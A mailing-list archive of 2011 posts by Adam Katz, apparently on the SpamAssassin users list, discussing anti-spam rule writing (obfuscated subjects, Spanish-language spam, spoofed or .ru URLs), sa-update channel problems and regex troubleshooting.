Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/15/2011 03:37 PM, John Hardin wrote:
 On Thu, 13 Oct 2011, Mynabbler wrote:
 
 Typically the chickenpox rules do not get a lot of love abroad,
 since they tend to trip over other languages than English. However,
 does someone have an idea how to use the logic in chickenpox for
 subjects like these:
 
 ... or does someone have a decent rule to tag this kind of crap?
 
 I've got something in local masscheck right now, should commit later 
 today. Check my sandbox tomorrow.

header  __SUBJ_OBFU_PUNCT  Subject =~
/(?:[-~`!@\#$%^*()_+={}|\\\/?,.:;][a-z][-~`!@\#$%^*()_+={}|\\\/?,.:;\s]|[a-z][~`!@\#$%^*()_+={}|\\\/?,.:;][a-z])/i

How does this differ from a negation, like:

/[^\[\]'\w\s][a-z][^\[\]'\w]|[a-z][^\[\]'\w\s-][a-z]/i

and how does this not FP all over the place with subjects like:

Time for F-U-N
I like D&D and rock&roll
/var/spool/mail is full


I think this would satisfy the original request:

header   __SUBJ_LACKS_WORDS
  Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/

(I have not checked that in, feel free if you like it.)





Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/17/2011 02:29 PM, Adam Katz wrote:
 I think this would satisfy the original request:
 
 header   __SUBJ_LACKS_WORDS
   Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/
 
 (I have not checked that in, feel free if you like it.)

Okay, that needed a little work (boo to double-negatives).  Also, I
hadn't noticed the new thread (sorry).

Just checked this in:

header __SUBJ_NOT_SHORTSubject =~ /^.{16}/
header __SUBJ_HAS_WORDSSubject =~ /(?:^|\s)[^\W0-9_]{3,15}(?:\s|$)/
meta SUBJ_LACKS_WORDS  __SUBJ_NOT_SHORT && !__SUBJ_HAS_WORDS && !__SUBJECT_ENCODED_B64
describe SUBJ_LACKS_WORDS  Non-short subject lacks words

Even this will hit a fair amount of ham, especially with foreign
languages (I tried to work around this with [^\W0-9_] instead of [a-z]
in the event a locale is in use).
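Here's the gist of that logic as a Python sketch (it omits the __SUBJECT_ENCODED_B64 guard, and the sample subjects are mine):

```python
import re

# Flag subjects that are at least 16 characters long yet contain no
# whitespace-delimited run of 3-15 letters ([^\W0-9_] = letters only).
not_short = re.compile(r'^.{16}')
has_words = re.compile(r'(?:^|\s)[^\W0-9_]{3,15}(?:\s|$)')

def subj_lacks_words(subject):
    return bool(not_short.search(subject)) and not has_words.search(subject)

assert subj_lacks_words('V1@gr@ ch3ap n0w b.u.y 2day!!')
assert not subj_lacks_words('Meeting notes for Tuesday')
assert not subj_lacks_words('Hi!!')   # too short to count
```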





Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/17/2011 04:36 PM, John Hardin wrote:
 On Mon, 17 Oct 2011, Adam Katz wrote:
 Time for F-U-N
 I like DD and rockroll
 /var/spool/mail is full
 
 It must hit more than a specified number of times. __SUBJ_OBFU_PUNCT
 isn't scored, SUBJ_OBFU_PUNCT_FEW and SUBJ_OBFU_PUNCT_MANY are.

Each of my examples hits SUBJ_OBFU_PUNCT_FEW, and it wouldn't be hard
for them to hit SUBJ_OBFU_PUNCT_MANY either.

 I think this would satisfy the original request:

 header   __SUBJ_LACKS_WORDS
   Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/

 (I have not checked that in, feel free if you like it.)
 
 When I get home tonight.

See my other email, already checked in :-)





Re: New Bayes like paradigm

2011-10-13 Thread Adam Katz
 On 9/28/2011 8:02 AM, dar...@chaosreigns.com wrote:
 You definitely have a good point that it would only be necessary to
 track the combinations that actually show up in emails, however
 1024 is only the possible combinations from one set of 10 rules.
 The number of combinations in the actual corpora would be much
 higher.  I'll try to get you a number.

On 10/10/2011 06:55 AM, Marc Perkel wrote:
 You wouldn't have to store all combinations. You could just do up to
 3 levels and only the combinations that actually occur and use a hash
 to look up the combinations.

The data is all there if you have access to the spam.log and ham.log
files created by mass-check (warning, this code was composed in email,
not vim, and it has not been run):

#
#!/bin/sh
# Give three rules as arguments.  Assumes ham.log and spam.log in PWD

export GREP_OPTIONS=--mmap

tp=`grep -w $1 spam.log |grep -w $2 |grep -wc $3`
fp=`grep -w $1  ham.log |grep -w $2 |grep -wc $3`

spams=`grep -c '^[^#]' spam.log`
hams=` grep -c '^[^#]' ham.log`

tpr=`echo "scale=5; $tp * 100 / $spams" |bc`
fpr=`echo "scale=5; $fp * 100 / $hams"  |bc`

so=`echo "scale=4; $tpr / ($tpr + $fpr)" |bc`

echo "meta rule  $1 && $2 && $3"
echo "  SPAM% $tpr   HAM% $fpr   S/O $so"
#

Now you can pick your thresholds for moving forward (and your thresholds
for saving a combination as a no-go in the future).  These numbers are
just as valid as anything you'd get through the actual mass-check run.
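In other words (same arithmetic as the script, minus the shell quoting; the counts here are invented purely to show the computation):

```python
# Compute S/O for a rule combo; tp/fp and corpus sizes are invented.
def s_o(tp, fp, spams, hams):
    tpr = tp * 100.0 / spams  # percent of spam the combo hits
    fpr = fp * 100.0 / hams   # percent of ham the combo hits
    return tpr / (tpr + fpr)

# a hypothetical 3-rule combo hitting 420 of 10,000 spams, 3 of 10,000 hams:
print(round(s_o(420, 3, 10000, 10000), 4))  # 0.9929
```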

Still, I worry about what this does to the GA.


PS:  As an SA Committer, do I have access to those logs?





Re: antiphishing

2011-10-12 Thread Adam Katz
On 10/12/2011 11:48 AM, dar...@chaosreigns.com wrote:
 Which uses it as part of SPOOFED_URL (the __ in the other rule is
 important), which is described as:
 Has a link whose text is a different URL.  But that one hasn't made it
 into the default rule set yet.  Ah, it hits 1.1% of spam but also 0.7% of
 non-spam, shame:
 http://ruleqa.spamassassin.org/?daterev=20111008-r1180336-n&rule=%2Fspoofed
 (it got a T_ prepended to it due to being in testing)
 
 Wonder what it's hitting in non-spam.  And if it could be improved by just
 checking for domain mismatch instead of complete url match, if it's not
 doing that already.

As noted in the comment right next to the rule, most of those hits are
marketing trackers.  Another abutting comment notes that LeadLander has
a truncation habit that used to cause it to mis-fire.  There are also
abbreviations, parsing errors (not necessarily from SA), and probably
also link shorteners and gags.

I was a little out of sync with subversion.  This is now fixed.

While the new version is a bit better, it's still nowhere near good
enough to become a stand-alone rule, even with all the help I tried to
give it.





Re: Your mailbox has exceeded...

2011-09-30 Thread Adam Katz
 On 30/09/11 01:41, jida...@jidanni.org wrote:
 Sure a lot of "Your mailbox has exceeded" spam these days.

Phish rises this time of year ;-)

On 09/30/2011 09:31 AM, Ned Slider wrote:
 I've seen a few of these, but probably not enough examples to have
 Bayes reliably catch them yet - the first few sneaked straight
 through uncaught.

Right, phish thrives on low volume so it can stay under the radar.
Bayes is not good at catching such things.

 If we could organise a working group or something, and/or collect 
 some examples, I'd happily help with writing some rules specifically 
 for these.

I'd be game for helping there too.  Phish Tank is a starting point,
though it is riddled with non-phish (both spam and FPs).





Re: Plugin for Spanish Spams?

2011-09-09 Thread Adam Katz
On 09/09/2011 02:16 AM, Alok Kushwaha wrote:
 I am using the 'SpamAssassin Server version 3.3.2'  but 'Spanish
 spams' are getting through.  Can anyone please suggest/point me the
 rule-set/plug-in for Spanish spams.

The short answer is to train bayes; it's far better at this sort of
thing than anything else, even the language detection I'm about to suggest.


Enable (un-comment) TextCat in v310.pre and then add this to your
local.cf (adjust as needed):

ok_languages en hi


If that's not enough, create an anti-Spanish rule:

header SPANISH_BODY  X-Languages =~ /\bes/

(You'll have to verify that header name, I thought we always named our
headers and pseudo-headers X-Spam-*.  Also note that this is a
pseudo-header, which means it doesn't show up in your emails unless you
tell it to, e.g. with a line like add_header all Languages _LANGUAGES_
though then it will always be named X-Spam-Languages)

See also the perldoc/man page for Mail::SpamAssassin::Plugin::TextCat


Note that Spanish is not the easiest language to detect given its
similarities to English in addition to the fact that most conversations
are spattered with English words and even phrases.  This can only do so
much.

Axb's solution is dangerous but might work for you:
 you mean block ñ á é ó í  and what else? the rest is quivalent to en 

So maybe something like:

body __HAS_N_TILDE    /[\xf1\xd1][a-z]/
body __HAS_A_ACUTE    /[\xc1\xe1]/
body __HAS_E_ACUTE    /[\xc9\xe9]/
body __HAS_I_ACUTE    /[\xcd\xed]/
body __HAS_O_ACUTE    /[\xd3\xf3]/
body __HAS_U_ACUTE    /[\xda\xfa]/
body __HAS_LOS_LAS/\bl[ao]s\b/i
body __HAS_DEL_DE_LA  /\bde(?:l|\sla)\b/i
body __HAS_ESTA_ESTE  /\best[ae]\b/i
body __HAS_PARA   /\bpara\s/i

meta MAYBE_SPANISH    __HAS_N_TILDE + __HAS_A_ACUTE + __HAS_E_ACUTE +
__HAS_I_ACUTE + __HAS_O_ACUTE + __HAS_U_ACUTE + __HAS_LOS_LAS +
__HAS_DEL_DE_LA + __HAS_ESTA_ESTE + __HAS_PARA > 2
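To illustrate the threshold, here are the word-based sub-rules re-expressed in Python (the accent-class rules are omitted since they assume a Latin-1 body, and the sample sentences are mine):

```python
import re

# Word-based sub-rules from above; accent-class rules omitted (they
# assume Latin-1 bytes).  Sample sentences are invented.
subrules = [
    re.compile(r'\bl[ao]s\b', re.I),        # __HAS_LOS_LAS
    re.compile(r'\bde(?:l|\sla)\b', re.I),  # __HAS_DEL_DE_LA
    re.compile(r'\best[ae]\b', re.I),       # __HAS_ESTA_ESTE
    re.compile(r'\bpara\s', re.I),          # __HAS_PARA
]

def maybe_spanish(body):
    hits = sum(1 for r in subrules if r.search(body))
    return hits > 2  # same "more than two sub-rules" threshold as the meta

print(maybe_spanish("Gracias para los amigos de la ciudad."))  # True
print(maybe_spanish("Thanks for sending the meeting notes."))  # False
```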


or maybe combining everything together; to all of the above, add:

score MAYBE_SPANISH 0.0001

# Zero or multiple languages detected
header __LANG_UNKNOWN  X-Languages =~ /^\s*$|\w \w/

meta  MAYBE_SPANISH2  SPANISH_BODY || (__LANG_UNKNOWN && MAYBE_SPANISH)
score MAYBE_SPANISH2  1


When it comes to scoring, *always start small*.  You can turn it up
(slowly, in small increments!) once you know it's safe for you.





Re: Why does this hit __HAS_ANY_URI

2011-08-22 Thread Adam Katz
On 08/14/2011 02:17 PM, Ned Slider wrote:
 Hi all,
 
 The following email hits __HAS_ANY_URI and I'm not sure why:
 
 http://pastebin.com/jvFrFhA4
 
 When I run the message through SpamAssassin in debug mode I see:
 
 dbg: rules: __DOS_HAS_ANY_URI merged duplicates: __HAS_ANY_URI
 dbg: rules: ran uri rule __DOS_HAS_ANY_URI ==> got hit: "r"
 
 SpamAssassin version 3.3.2
 
 Any clues? I'm guessing it has something to do with the email address in
 the message body?

The letter "r" is the beginning of an implicit mailto: URI in the body
(ram12...@live.com).





Re: blacklist based on authoritative nameservers of sender domain

2011-08-22 Thread Adam Katz
On 08/22/2011 04:13 PM, Noah Meyerhans wrote:
 I've recently observed a fair amount of spam from domains that all
 share the same set of authoritative nameservers.  It occurred to me
 that it might be nice to be able to blacklist mail from all domains
 sharing these nameservers, or maybe to simply have that trait count
 toward the spam score.

You can't do whois en-masse (I'd love that, but ...), so this means an
NS host lookup.  To determine if they are authoritative, that's another
lookup (which I don't believe is necessary).  A blocklist would also be
another lookup (if using a BL, it could check the authoritativeness),
but I don't think that's completely necessary either.

Your plugin should create enough information for bayes and rules to
access the data, say through a pseudoheader that can be explicitly added
via template tags.

Thus, you'd be able to write a rule that checks the pseudoheader for a
problematic name server.  Here's a mockup pseudoheader and matching rule
for an email that links spamassassin.org and example.net:

X-Spam-Uri-NS: [ dom=spamassassin.org ns=c.auth-ns.sonic.net
ns=ns.hyperreal.org ns=b.auth-ns.sonic.net ns=a.auth-ns.sonic.net ] [
dom=example.net ns=b.iana-servers.net. ns=a.iana-servers.net ]

header LOCAL_USES_DNS_EXAMPLE_NET X-Spam-Uri-NS =~ /
ns=[ab].iana-servers\.net /

I left out NS server IPs because that's even more DNS lookups.  URIs are
in order of appearance.  NS order is not predictable (though I suppose
we could asciibetize).
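As a quick sanity check, the mockup header and rule do line up (Python stand-in; both the header value and the rule are the hypothetical examples above):

```python
import re

# The mockup X-Spam-Uri-NS value and the example rule pattern, both
# hypothetical, checked against each other.
header = ("[ dom=spamassassin.org ns=c.auth-ns.sonic.net"
          " ns=ns.hyperreal.org ns=b.auth-ns.sonic.net ns=a.auth-ns.sonic.net ]"
          " [ dom=example.net ns=b.iana-servers.net. ns=a.iana-servers.net ]")

rule = re.compile(r' ns=[ab].iana-servers\.net ')
print(bool(rule.search(header)))  # True, via the a.iana-servers.net entry
```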

 I don't believe there's currently a plugin to allow this sort of
 thing.  Is that correct?  If so, would anybody be interested in one
 if I was to write it?  Or am I missing something obvious that makes
 this not worth doing?  I realize that the potential for collateral
 damage is high, so I don't think it'd be wise to try and publish any
 sort of data for such a plugin, but it seems like the plugin itself
 might be occasionally useful...

It might be useful, but we'd have to test it to know.





Re: SA-update: failing for khopesh.com rules?

2011-08-08 Thread Adam Katz
On Fri, 05 Aug 2011 10:49:36 -0700, Adam Katz wrote:
 I fixed this yesterday and updates are now fully functional.

On 08/05/2011 07:36 PM, Benny Pedersen wrote:
 super, i just noticed nopublis in the above file, is this intended ?

Short answer:  Yes.  The GA is too slow to publish them itself.


Longer answer:

Until subversion repository checkins reliably get published with a
sub-24h turnaround time, the rules in khop-sc-neighbors should not be
published through that mechanism.  My sa-update channel is updated a few
times each day and can handle that.

Another issue with upstream is that we'd have to be extra-careful to
retract all of these rules once we stop updating them (i.e. when a new
release comes out and the older one's auto-updates dwindle).

Its regular checkins to the SVN trunk (which are *not* as frequent as
the channel's updates) are for ruleQA purposes only, acting as evidence
that the rules are of high quality.


One further note:  The CIDR/8 rules (and the others, to a small degree)
look *very* solid to the scoring mechanism.  This is in part due to
sampling bias; we have very little ham coming in from Latin America,
Africa (esp. Nigeria), and Asia (esp. China), which tend to amplify
rules that specifically target those regions.  It is also unfair to
penalize somebody for their provider's /8, which would be entirely out
of their control.  Both of these reasons mandate the rules stay capped
at low scores.

(I hear the publishing mechanism now allows for scores set in the
sandboxes to act as upper limits on published rules.  That would solve
this issue.)





Re: SA-update: failing for khopesh.com rules?

2011-08-05 Thread Adam Katz
On 07/23/2011 01:05 PM, Benny Pedersen wrote:
 On Sat, 23 Jul 2011 00:35:41 -0700 (PDT), Fenris wrote:
 
 http://khopesh.com/sa/khop-sc-neighbors/2011062101.tar.gz request
 failed: 404 Not Found:
 
 Sorry Adam, I'm still seeing the same problem this morning, for whatever
 reason it's still asking for
 the 21st June tar.gz that was causing the problem originally.

 My end, or your end?
 
 see same problem here, other khop channels are ok with 3.3.2

One of the DNS slaves changed its IP (and my provider didn't tell me
about it), so the zone transfer requests were getting denied.  The other
one has been fine for a while, so it's luck of the draw.

I fixed this yesterday and updates are now fully functional.





Re: ok, we all get spam.. but.. spam warning us we opted out?

2011-07-27 Thread Adam Katz
 On 7/26/11 8:41 PM, Karsten Bräckelmann wrote:
 Did the message genuinely come from Dell? The named $director
 entity? Or was it an ESP on behalf of Dell?

On 07/27/2011 07:13 AM, Michael Scheidell wrote:
 noop, dell directly, with a DNSWL_MED credit on the email with the 
 default rules SA has for DNSWL.  I did reply back and tell the user
 that that email finally qualifies them to take the management
 training class at mcdonalds and that they should go back to their
 local mcd's and fill out the application again.

It's probably an honest mistake from somebody at Dell that didn't
consider all the possibilities.  Rather than trying to get that person
fired, how about explaining the issue to them?  I'm sure they'll
apologize and then make sure it won't happen again (it might even
convince them to do more business with ESPs).

Certainly good for a laugh though!





Re: Heads up: Plesk + SpamAssassin, spam attack doing the rounds

2011-07-27 Thread Adam Katz
On 07/27/2011 10:32 AM, Benny Pedersen wrote:
 On Wed, 27 Jul 2011 18:13:25 +0100, Bruno Ferreira - Digitalmente Lda.
 wrote:
 Hi, registered just to post this, in hope that it'll be of help for
 some other users. This pertains boxes with Plesk + SpamAssassin.
 
 http://old.nabble.com/postfwd-stop-equal-sender-recipient-spams-td21164908.html
 
 use strong policy to drop there pants :-)

You're going to drop a lot of pants "there" (where?  You meant "their"),
as it's common practice to send manual announcement emails with From ==
To and the real recipients in the Bcc field.

We even have this rule in SpamAssassin due to popular insistence.

It does quite poorly:

  MSECS    SPAM%     HAM%     S/O    RANK   SCORE  NAME
      0   2.0912   1.5324   0.577   0.50   (n/a)  __TO_EQ_FROM

http://ruleqa.spamassassin.org/20110726-r1151020-n/__TO_EQ_FROM/detail





Re: SA-update: failing for khopesh.com rules?

2011-07-19 Thread Adam Katz
Fenris b...@fenrir.org.uk wrote
 Recently (for a few weeks I think) I've been seeing errors from my 
 sa-update script, like this:
 
 /etc/cron.daily/sa-update:
 
 http: GET
 http://khopesh.com/sa/khop-sc-neighbors/2011062101.tar.gz request 
 failed: 404 Not Found:
...
 channel: could not find working mirror, channel failed
 
 Is anyone else using Adam's rules seeing this problem? It looks 
 like either something has moved or his rules are not being updated 
 at present.

2011062101 maps to June 21, which is quite old.  Those rules should be
auto-generated every few hours, with a sufficient cache of older entries
to deal with the time required to expire old DNS records.  That one is
so old that it left the cache.

The problem was an error in one of my experimental DNSBLs, which
inexplicably decided one entry should point to 127.0.0. and leave off
the trailing digit.  My vetting script failed and I've been over a month
un-noticed in not serving DNS from my private root (khopesh.com's NS
records are slaves, they've been working fine since getting cut off).

Fixed.

Feel free to yell at me directly and earlier next time :-)
... Cc the list so others don't independently do the same.


On 07/19/2011 09:02 AM, Jezz wrote:
 I'm getting the same thing with khop-sc-neighbors, but not with the 
 other two that I use (khop-general and khop-dynamic). However I 
 haven't had any update from those latter two since 24 June, which is 
 also a little unusual.

That's because I haven't updated any of the manual channels since
February.  I'll get around to that at some point, but it won't become
high priority until 3.4.0 comes out, as the main benefit of those
channels is that they deliver newer rules before those rules get
published upstream (e.g. khop-bl is good at bringing sa3.2.5 a little
more up to date, though it also adds other DNSBLs and then compensates
for the extra overlap, which is probably the only safe way to use some
of them, like SEM).  Also, I've been pushing things to the trunk more
than my channels, though khop-dynamic is pretty much ready for upstream
publishing.

Again, this is a limited time thing (I get burned out from all the SA
rule writing I'm doing professionally!).  Another hurdle is the
conflict-of-interest bit; I got access to some nice data streams right
before taking on my current job but need to ping those suppliers before
actually using the data due to these changes.  Otherwise, sc-neighbors
would be significantly improved...





Re: FSL_RU_URL Re: whitelist

2011-06-24 Thread Adam Katz
On 06/23/2011 05:48 PM, Noel Butler wrote:
 Hrmm sa-update reports no new updates, last touch date was march 25
 
 Jun 24 10:21:24.410 [30018] dbg: dns: 1.3.3.updates.spamassassin.org =>
 1083704, parsed as 1083704
 Jun 24 10:21:24.410 [30018] dbg: channel: current version is 1083704,
 new version is 1083704, skipping channel

Whoa, not sure how I missed that;

% host -ttxt 1.3.3.updates.spamassassin.org.
1.3.3.updates.spamassassin.org descriptive text 1083704
% host -ttxt mirrors.updates.spamassassin.org.
mirrors.updates.spamassassin.org descriptive text
http://spamassassin.apache.org/updates/MIRRORED.BY;
% wget -qq -O - http://spamassassin.apache.org/updates/MIRRORED.BY
# test mirror: zone, cached via Coral
#http://buildbot.spamassassin.org.nyud.net:8090/updatestage/
http://daryl.dostech.ca/sa-update/asf/ weight=5
http://www.sa-update.pccc.com/ weight=5
% wget -qq http://daryl.dostech.ca/sa-update/asf/1083704.tar.gz
% tar -zxf 1083704.tar.gz
% grep FSL_RU_URL *cf
72_active.cf:##{ FSL_RU_URL
72_active.cf:uri  FSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
72_active.cf:#score    FSL_RU_URL  0.01
72_active.cf:##} FSL_RU_URL
72_scores.cf:score FSL_RU_URL  3.499 2.271 3.499 2.271

We'll need to fix that.


 I do have a few from years gone by, do you know off hand if these are
 no longer needed postcards.cf rateware.cf 70_tt_drugs.cf
 99_anonwhois.cf, the others I use give us hits, but its rare that
 those do.

ratware (different from rateware?) and tt_drugs should be wholly
obsoleted by existing rules.  John Hardin wrote postcards.cf (which I
had never seen before), so since he's on this list, he can comment on
that (were those ever in svn?).

I ran across the AnonWhois stuff (which is owned by Spam-Eating Monkey,
whose DNSBL has had issues in the past) a while ago and forgot about it
... looks like it's maintained (last updated 2011-01-17), but it lacks
an sa-update channel (so like Malware Patrol, you have to grab it
yourself).  Note that all the rules are scored 0.001 (as they should
be!), so unless you're building rules from these, they are useless to
you and will waste bandwidth.  By the way they implement things, a lot
of bandwidth (100 lookups per link per email; you just wasted 600
lookups on this message alone!).  Bottom line:  delete this file.

 Since FSL_RU_URL is so broad that it will match any link to any .ru
 domain, we don't really need to see an example (unless you're confident
 you have an example which lacks an actual .ru link ... this is a bug if
 that's triggering on one of the headers you're mentioning).

 That's what prompted me to ask, it is very broad.

Pastebin an example or two and link us to them.





FSL_RU_URL Re: whitelist

2011-06-23 Thread Adam Katz
On 06/22/2011 05:42 PM, Noel Butler wrote:
 Resurrecting an old thread but
 Lately I see a lot of false hits on   FSL_RU_URL
 The only place in the email where .ru is, is in envelope-from ,  from,
 and the received headers, this is supposed to be
 from   72_active.cf:uri    FSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
 
 (those also on the c-nsp list may also be seeing the same?)
 This only started recently.

Full rule, originating from rulesrc/sandbox/maddoc/99_fsl_testing.cf

uri  FSL_RU_URL  /[^\/]+\.ru(?:$|\/|\?)/i
tflags   FSL_RU_URL  nopublish
scoreFSL_RU_URL  0.01

I see several problems here.

Chiefly, it's marked nopublish but is in some(?) copies of
72_active.cf (not trunk, and the rule is completely absent from the
current 3.3 and 3.2 svn branches) ... is this out of sync?  IIRC, we
fixed this problem a while ago, so perhaps Noel's system isn't properly
using sa-update, it hasn't propagated yet, or he's doing something fishy.

Scoring a rule in a sandbox is good for documentation purposes
(especially if mirroring a third-party sa-update channel), but has no
bearing on the resulting score published through the GA.  Therefore,
scoring something 0.01 as a safety net does nothing.  A rule with tflags
nopublish and score 0.01 is much safer (given our current bugs) if named
with the T_ prefix.  (Other devs, please correct me if I'm wrong here;
I'm not fully sure about the un-sandboxing mechanism.)

A safer and cleaner regex for that rule would be:

uri  FSL_RU_URL  m'^http://[^/:#?]+\.ru\b(?:$|[/:#?])'i

This prevents FPs like http://ham.example.com/how.ru and FNs like
http://spam.example.ru:8080/gotcha and uses a regex character class
(square brackets) rather than branches (pipes) for efficiency and
legibility purposes.  The \b also provides a (very minor) efficiency
boost.  It also excludes https links as they're more likely to be ham.
I moved to m'' to avoid the need to escape slashes.
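Transliterated to Python (re.I standing in for the /i flag), the tightened pattern behaves as described on the examples above:

```python
import re

# The proposed regex, checked against the FP/FN examples from above.
ru_url = re.compile(r"^http://[^/:#?]+\.ru\b(?:$|[/:#?])", re.I)

print(bool(ru_url.search("http://spam.example.ru:8080/gotcha")))  # True  (no longer an FN)
print(bool(ru_url.search("http://ham.example.com/how.ru")))       # False (no longer an FP)
print(bool(ru_url.search("https://shop.example.ru/")))            # False (https excluded)
```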

Even still, this is an awful rule, especially without leading
underscores (e.g. __FSL_RU_URL) to be used in a meta rule that hunts a
particular spam pattern.


As Ned answered, we need more information.  Specifically, tell us about
your setup; what version (and package) of SpamAssassin are you using,
tell us about your sa-update configuration, any hacks, etc.

Since FSL_RU_URL is so broad that it will match any link to any .ru
domain, we don't really need to see an example (unless you're confident
you have an example which lacks an actual .ru link ... this is a bug if
that's triggering on one of the headers you're mentioning).





Re: Yahoo sent 5.5x as much spam as any other legit provider in April

2011-05-11 Thread Adam Katz
On 05/11/2011 01:19 PM, dar...@chaosreigns.com wrote:
 I bet it's largely related to the fact that yahoo is apparently the
 only freemail provider that doesn't require you to have a previously
 existing email address.

I just created a test @live.com (hotmail) account without an
existing address.  Just tell it to use a security question instead.  I
am under the impression that gmail is the only one that has that sort of
protection, and even it is trivially defeated (look up mailinator for
one method).





Re: Yahoo sent 5.5x as much spam as any other legit provider in April

2011-05-11 Thread Adam Katz
On 05/11/2011 01:01 PM, dar...@chaosreigns.com wrote:
 http://www.chaosreigns.com/dnswl/dnswlabusehistory.svg

Too bad FF doesn't let me zoom on an svg; had to hit F11 to see it.

 Percentage of total spam from legitimate email providers in April as
 reported as abuse to dnswl.org:
 
 35.5% yahoo.com
  6.4% google.com
  2.9% tp.pl
  2.3% tin.it
  1.8% messagelabs.com
  1.4% hotmail.com
  1.1% postini.com
  1.0% orange.fr
  1.0% aol.com
...

Long tail there; the sum of all of your items was 56.5%.  Even if you
truncated those numbers, it doesn't add up (56.5 + 19 * 0.1%  = 58.4%).

I'm not sure how much of my company's data I can disperse, but here's a
peek.  We break things down a little differently, but here is what
overlaps (as isolated by From header in trap + report data, classified
spam only):

100.0%  (sum of all items below)
 32.6%  yahoo
 29.4%  hotmail + live
 17.3%  gmail
 10.8%  aol
  9.8%  facebook
  0.1%  orange.fr

So with this data, yahoo sent 1.1x as much as hotmail.





Re: Amazon S3 triggering FPs with SPOOF_COM* rules

2011-04-26 Thread Adam Katz
On 03/24/2011 05:44 PM, Jason Haar wrote:
 Apparently when you use sharethis.com (who use S3 for hosting services)
 to send out links, the links look like
 
 hXXp://img.sharethis.com *DOT* s3.amazonaws.com
 
 I imagine from this that ANY .com domain using Amazon S3 services would
 create similar URLs?
 
 This causes SPOOF_COM* rules to trigger
 
 *  3.0 SPOOF_COM2OTH URI: URI contains .com in middle
 *  1.6 SPOOF_COM2COM URI: URI contains .com in middle and end
 
 Owch. So there's a big class of FPs happening there, and I'd say there's
 redundancy in those rules? i.e. is 4.6 really an appropriate score for
 *one* img link?

Not necessarily a perfect fix, but I've checked in r1096851 which
specifically excludes S3 from these rules.  Note that most CDNs are .net
(like Coral CDN, e.g. www.spamassassin.org.nyud.net) and therefore won't
hit _COM2COM.  Coral doesn't tack on enough subdomain levels to trigger
COM2OTH.

There's still the issue of perhaps wanting these rules to be mutually
exclusive.  Maybe SPOOF_COM2OTH, which is currently (with my edit):

m{^https?://(?:\w+\.)+?com\.(?!s3\.amazonaws\.com)(?:\w+\.){2}}i

Should become this:

m{^https?://(?:\w+\.)+?com\.(?:\w+\.){2,}?(?!com\b)}i

(oops, the other rules should be com\b too.  checked in as r1096857.)
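Here's the same check in Python against a couple of made-up URLs, to show the S3 carve-out working:

```python
import re

# The r1096851 form of SPOOF_COM2OTH, transliterated; URLs are invented.
spoof = re.compile(
    r"^https?://(?:\w+\.)+?com\.(?!s3\.amazonaws\.com)(?:\w+\.){2}", re.I)

print(bool(spoof.search("http://img.sharethis.com.s3.amazonaws.com/x.png")))  # False now
print(bool(spoof.search("http://paypal.com.evil.example.org/login")))         # still True
```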





Re: Regex help

2011-04-22 Thread Adam Katz
On 04/21/2011 05:22 PM, John Hardin wrote:
 On Thu, 21 Apr 2011, Adam Katz wrote:
 
 rawbody LOCAL_5X_BR_TAGS   /(?:<br\/?>[\s\r\n]{0,4}){5}/mi
 
 ...when does \s{0,4} not match the same text as [\s\r\n]{0,4} ?
 
 (i.e. \r and \n are whitespace, no?)

I believe they are identical assuming /msi flags.  I seem to recall a
particular problem with the engine having trouble here, though that was
probably related to rendered bodies on systems that determine line
breaks differently.  It may instead be related to something specific
with my company's implementation, which is rather nonstandard.

Finally, [\s\r\n] is more legible for troubleshooting as it acts as a
reminder of what is going on.  In the event that there is an efficiency
issue, \s is first.





Re: Regex help

2011-04-22 Thread Adam Katz
On 04/22/2011 07:02 AM, Joseph Brennan wrote:
 I'd be cautious with this.
 
 I have tried scoring for multiple br and also for more than ten 
 closing /div in a row, but unless you score very low, you'll get 
 false positives. Unfortunately some legitimate software products 
 translate their native format into HTML with ugly code like that.
 
 It could be that a meta of multiple br plus something else gets a
 more accurate spam diagnosis, so I'm not saying it's useless, but it
 is not as straightforward as it seems.

+1

My mention of this may have been lost in the noise, especially given how
I've continued along this path intellectually.





Re: Regex help

2011-04-22 Thread Adam Katz
Getting back to a viable solution to your actual spam problem...

 Adam Katz wrote:
 How about this rule instead:
 
 blacklist_from  *@regionstargpsupdates.com

On 04/21/2011 04:37 PM, Kevin Miller wrote:
 Yes, but then I'm playing whack-a-mole.  Looking at the spam in html
 format (i.e., in the original email) one can see a similarities in
 style - probably produced from a template.  But the domain varies
 widely.  I may get anywhere from a half dozen to several dozen from
 any one domain, then never see that domain again.  Classic botnet
 behaviour.  These guys cycle through domains and from addresses
 regularly.

Okay, I couldn't tell that from your single sample.  Perhaps you can
post a few more?

If it's easier to post in one pass, you can use the following shell code
(as adjusted to include the proper files rather than my guesses) to
generate a fake mbox file (/tmp/dump) and then paste that into a pastebin:

for msg in p3LJZSnX024470 p3LJZSnX024471 p3LJZSnX024472 p3LJZSnX024473;
do echo "From $msg@KM" >> /tmp/dump; cat $msg >> /tmp/dump; done

Fun note:  pastebin.com now supports email syntax highlighting!





Re: Regex help

2011-04-21 Thread Adam Katz
Before I help you with your shell and regex issues, I should point out
that this is not a very strong rule.  It will hit ham.

On 04/21/2011 02:54 PM, Kevin Miller wrote:
 I'm trying to write a local rule that will scan for 5 or more 
 instances of br but not having much luck.  I'm testing first on 
 the CLI, just trying to get the syntax down.

 What works:
 I have a file called DomainLiterals.txt with repeating characters
 and it returns expected results:
 mkm@mis-mkm-lnx:~$ egrep \[10.]{3} DomainLiterals.txt 
 you can add a line containing only [10.10.10.10] to
 /etc/mail/local-host-names where 10.10.10.10 is the IP address you

The regex '\[10.]{3}' is invalid.  It un-escapes from the command line as
'[10.]{3}' but will match any of these:

111
...
000
10.
.01

since it is asking for three of any character matching one, zero, or
dot.  The grouping symbol you are looking for is a curly-bracket, and
the dot (when outside a square bracket) must be escaped as it otherwise
means any single character.
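A quick demonstration (Python here, though the character-class semantics are the same in egrep):

```python
import re

# '[10.]{3}' = any three consecutive characters drawn from {1, 0, .}
pat = re.compile(r"[10.]{3}")

for s in ("111", "000", "10.", ".01", "abc"):
    print(s, bool(pat.search(s)))  # only "abc" fails to match
```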

 However, doing this fails:
 mxg:/var/spool/MailScanner/quarantine/20110421/nonspam # egrep \[<br>]{5,} 
